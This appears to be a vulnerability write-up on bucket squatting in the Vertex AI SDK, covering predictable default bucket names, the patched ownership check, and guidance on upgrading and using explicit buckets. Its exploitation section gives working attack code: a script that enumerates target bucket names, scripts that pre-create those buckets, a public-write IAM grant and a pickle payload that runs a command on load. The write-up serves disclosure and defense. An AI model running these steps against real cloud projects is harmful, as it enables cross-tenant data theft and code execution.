Feb 21, 2026 · 6 min read
The Vertex AI SDK generated predictable GCS bucket names. Attackers could create these buckets first (squatting). Victim data goes to attacker; attacker code goes to victim. Update SDK to v1.133.0+.
A classic 'Bucket Squatting' vulnerability in the Google Cloud Vertex AI SDK allows unauthenticated attackers to hijack the default storage used by machine learning experiments. By predicting the name of the Google Cloud Storage (GCS) bucket that the SDK automatically generates—based on the victim's Project ID and region—an attacker can pre-create this bucket in their own tenant. When the victim initializes their Vertex AI environment using default settings, their proprietary models, datasets, and training logs are unwittingly uploaded to the attacker's infrastructure. Furthermore, this channel can be reversed to inject malicious serialized objects, leading to Cross-Tenant Remote Code Execution (RCE).
In the world of MLOps, friction is the enemy. Data scientists want to train models, not provision infrastructure. Google knows this, which is why the Vertex AI SDK (google-cloud-aiplatform) is packed with 'magic' defaults. When you initialize an experiment using aiplatform.init(), you don't have to specify a staging bucket. The SDK, in its infinite helpfulness, says, "Don't worry, I'll handle the plumbing."
And here lies the problem. Automation requires predictability. For the SDK to automatically find or create a bucket for your project without asking you for a name, it must use a deterministic algorithm to generate that name. It takes your Google Cloud Project ID, adds your region, and appends a static suffix.
But in the cloud, convenience is often a backdoor. Because Google Cloud Storage (GCS) operates on a single, global namespace, bucket names must be unique across all Google customers. If I know what your bucket is going to be named before you do, and I create it first, I own it. It doesn't matter that it contains your Project ID in the string. Possession is nine-tenths of the law, and in GCS, the account that creates the bucket owns the IAM policy.
The vulnerability (CWE-340: Predictability Problems) stems from how python-aiplatform constructed these default names. Prior to version 1.133.0, the logic was effectively:
```python
bucket_name = f"vertex-ai-cloud-ml-{project_id}-{region}"
```
This string is entirely predictable. Project IDs are often public or easily guessable (e.g., company-name-prod, startup-dev). The region is usually one of the major hubs (like us-central1).
The flaw isn't just in the naming; it's in the verification. When the SDK initializes, it performs a check: "Does this bucket exist?" If the answer is "No," it creates it. If the answer is "Yes," it assumes the bucket belongs to the user and proceeds to upload sensitive artifacts. It failed to verify ownership.
This is the digital equivalent of mailing your tax returns to an address you found in the phone book without checking who actually lives there. If an attacker has already moved into 123 Vertex Lane, they are going to get your mail.
Let's look at the logic flow that enabled this. The vulnerable code path relied on standard GCS API calls that are indiscriminate regarding tenant boundaries.
The Vulnerable Logic (Conceptual):
```python
# pseudo-code of the pre-patched logic
def get_default_bucket(project_id, region):
    # 1. Deterministic Name Generation
    name = f"vertex-ai-cloud-ml-{project_id}-{region}"
    bucket = storage_client.bucket(name)

    # 2. The Check-and-Use Race
    if not bucket.exists():
        bucket.create(project=project_id)

    # 3. Implicit Trust: an existing bucket is assumed to belong to the user
    return bucket
```

The fix introduced in version 1.133.0 does two critical things: it adds entropy to the name (making it infeasible to guess) and validates the project number of the bucket's owner.
The Fix (Conceptual):
```python
# pseudo-code of the patched logic
def get_default_bucket(project_id, region):
    bucket = storage_client.bucket(f"vertex-ai-{project_id}-{region}")

    # 1. Verification of Ownership
    if bucket.exists():
        if bucket.project_number != current_user_project_number:
            raise SecurityException("Bucket exists but belongs to another project!")
        return bucket

    # 2. Entropy (if creating new)
    suffix = random_string(8)
    name = f"vertex-ai-{project_id}-{region}-{suffix}"
    return create_bucket(name)
```

By enforcing an ownership check, the SDK ensures that even if a squatter did guess the name, the client would refuse to upload data to it.
Exploiting this requires no special tools—just a valid GCP account and a bit of patience. Here is how an attacker executes the "Bucket Squatting" attack against a target organization.
Phase 1: Reconnaissance
The attacker identifies target Project IDs. This is easier than it sounds. They can be found in public GitHub repositories (embedded in config files), client-side JavaScript on public websites, or simply guessed (uber-internal-ml, openai-test-us).
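To make the search concrete, here is a minimal sketch of how a squatter could enumerate candidate bucket names; the project IDs and region list below are hypothetical placeholders, not real targets:

```python
# Sketch: enumerate predictable default bucket names for a target.
# TARGET_PROJECT_IDS is a hypothetical wordlist harvested from public
# repos, client-side JavaScript, or plain guessing.
TARGET_PROJECT_IDS = ["targetcorp-prod", "targetcorp-dev"]
COMMON_REGIONS = ["us-central1", "europe-west4", "asia-east1"]

candidates = [
    f"vertex-ai-cloud-ml-{project_id}-{region}"
    for project_id in TARGET_PROJECT_IDS
    for region in COMMON_REGIONS
]

for name in candidates:
    print(f"gs://{name}")
```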
Phase 2: The Land Grab
The attacker uses a script to iterate through common regions (us-central1, europe-west4, asia-east1) and creates the predicted buckets in their own malicious GCP project.
```bash
# Attacker creates the trap
gsutil mb gs://vertex-ai-cloud-ml-targetcorp-prod-us-central1
```
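Scripted, the land grab might look something like this sketch using the google-cloud-storage client; `attacker-sandbox` is a placeholder for a project the attacker controls:

```python
# Sketch: pre-create predicted buckets in the attacker's own project.
# "attacker-sandbox" is a placeholder attacker-controlled project ID.
from google.cloud import storage

client = storage.Client(project="attacker-sandbox")

for region in ["us-central1", "europe-west4", "asia-east1"]:
    name = f"vertex-ai-cloud-ml-targetcorp-prod-{region}"
    try:
        client.create_bucket(name, location=region)
        print(f"Squatted gs://{name}")
    except Exception as exc:  # e.g. name already taken globally
        print(f"Skipped {name}: {exc}")
```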
Phase 3: The Honey Pot Configuration
The attacker must allow the victim to write to this bucket. They update the IAM policy to grant roles/storage.objectAdmin to allAuthenticatedUsers. This sounds noisy, but since the bucket name is specific to the victim, random internet users aren't likely to stumble upon it. Only the victim's SDK will try to access it.
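With the google-cloud-storage client, that policy change is a few lines. This is a sketch; the bucket name simply follows the predicted pattern from Phase 2:

```python
# Sketch: grant write access to any authenticated Google account,
# so the victim's SDK can upload into the attacker's bucket.
from google.cloud import storage

client = storage.Client(project="attacker-sandbox")
bucket = client.get_bucket("vertex-ai-cloud-ml-targetcorp-prod-us-central1")

policy = bucket.get_iam_policy(requested_policy_version=3)
policy.bindings.append({
    "role": "roles/storage.objectAdmin",
    "members": {"allAuthenticatedUsers"},
})
bucket.set_iam_policy(policy)
```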
Phase 4: Execution
The victim runs their daily training job:
```python
from google.cloud import aiplatform

aiplatform.init(project="targetcorp-prod", location="us-central1")
# The SDK finds the attacker's bucket and links it.
```

As the training job runs, it uploads model.joblib, dataset.csv, and logs containing hyperparameters directly to the attacker's storage.
The immediate impact is a Confidentiality Breach. Machine learning models are often the "crown jewels" of tech companies, costing millions in compute time to train. An attacker gets a free copy. They also get the training data, which often contains PII or sensitive financial records.
However, the Integrity and RCE impacts are darker. Vertex AI experiments often reload artifacts. If the pipeline includes a step to validate the model or deploy it, the SDK pulls the object back from the bucket.
Since the attacker owns the bucket, they can replace the legitimate model.pkl with a malicious pickle file. When the victim's python process deserializes this object to "evaluate" the model, the attacker's payload executes. This grants the attacker code execution inside the victim's Vertex AI environment—a trusted, internal network zone that likely has access to other databases and secrets.
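The mechanics are the classic pickle gadget: any object whose `__reduce__` method returns a callable gets that callable executed at load time. A minimal, self-contained demonstration (not the actual payload used here):

```python
import os
import pickle

class MaliciousModel:
    def __reduce__(self):
        # pickle invokes this on deserialization; the returned
        # callable and arguments are executed by pickle.loads
        return (os.system, ("id",))

payload = pickle.dumps(MaliciousModel())
pickle.loads(payload)  # runs `id` in the loading process
```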
The primary fix is to upgrade the google-cloud-aiplatform library to version 1.133.0 or later immediately. This version introduces the "Project Validation" check that kills this attack vector dead.
However, as a general security practice, relying on SDK defaults for infrastructure resources is a bad habit. Security teams should enforce explicit bucket declarations.
Secure Initialization:
```python
from google.cloud import aiplatform

# Don't do this:
# aiplatform.init(project=...)

# Do this:
aiplatform.init(
    project="my-project",
    location="us-central1",
    staging_bucket="gs://my-manually-secured-bucket-v1",
)
```

Additionally, organizations should run scans using tools like stratus-red-team or custom scripts to identify whether any existing buckets used by their AI pipelines are hosted in projects they do not own. If you see data flowing to a bucket you can't see in your own Cloud Console, you have a problem.
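A custom check can be as simple as comparing a bucket's owning project number against your own. This is a sketch (the bucket name and project number are placeholders), and note that a permission error on a bucket your pipeline happily writes to is itself a red flag:

```python
# Sketch: verify that a staging bucket actually lives in your project.
from google.cloud import storage

def bucket_owned_by(bucket_name: str, expected_project_number: int) -> bool:
    client = storage.Client()
    # Raises Forbidden if you cannot even read the bucket's metadata
    bucket = client.get_bucket(bucket_name)
    return bucket.project_number == expected_project_number

# 123456789012 is a placeholder for your real project number
if not bucket_owned_by("my-manually-secured-bucket-v1", 123456789012):
    raise RuntimeError("Staging bucket is hosted outside our project!")
```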
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| google-cloud-aiplatform (Google) | >= 1.21.0, < 1.133.0 | 1.133.0 |
| Attribute | Detail |
|---|---|
| CWE | CWE-340 (Predictability Problems) |
| CVSS | 7.7 (High) |
| Attack Vector | Network (Pre-allocation) |
| Privileges Required | None |
| Impact | Data Exfiltration & RCE |
| Exploit Status | PoC / Method Known |
The software generates a predictable identifier for a resource, allowing an attacker to pre-create or guess the identifier to hijack the resource.